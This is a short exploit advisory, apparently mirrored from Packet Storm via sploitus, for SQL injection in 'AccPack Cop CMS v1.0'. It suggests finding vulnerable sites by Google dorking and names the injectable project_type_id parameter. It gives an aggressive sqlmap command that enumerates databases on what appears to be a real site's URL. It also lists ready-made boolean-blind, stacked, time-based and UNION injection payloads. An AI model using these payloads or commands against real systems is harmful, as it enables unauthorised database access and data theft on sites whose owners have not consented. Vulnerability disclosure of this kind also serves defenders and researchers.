Share
## https://sploitus.com/exploit?id=PACKETSTORM:179783
=============================================================================================================================================  
| # Title : AccPack Cop CMS v1.0 SQL injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |  
| # Vendor : http://webpay.com.np/#Product |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] use payload : index.php?project_type_id=1  
  
[+] https://www/127.0.0.1/demo/bccn.orgnp/projects/index.php?project_type_id=1 <=== inject here  
  
[+] E:\sqlmap>python sqlmap.py -u https://www.bccnorgnp/projects/index.php?project_type_id=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs  
  
[+] Parameter: project_type_id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: project_type_id=1 AND 5604=5604  
  
Type: stacked queries  
Title: MySQL < 5.0.12 stacked queries (BENCHMARK - comment)  
Payload: project_type_id=1;SELECT BENCHMARK(5000000,MD5(0x45507849))#  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: project_type_id=1 AND (SELECT 5053 FROM (SELECT(SLEEP(5)))tLpS)  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 2 columns  
Payload: project_type_id=-7152 UNION ALL SELECT NULL,CONCAT(0x717a766271,0x6e496a5078736e466d5662454c5a6a73517278504b4d786866495454786d56417073505956586b70,0x71716a6a71)-- -  
---  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================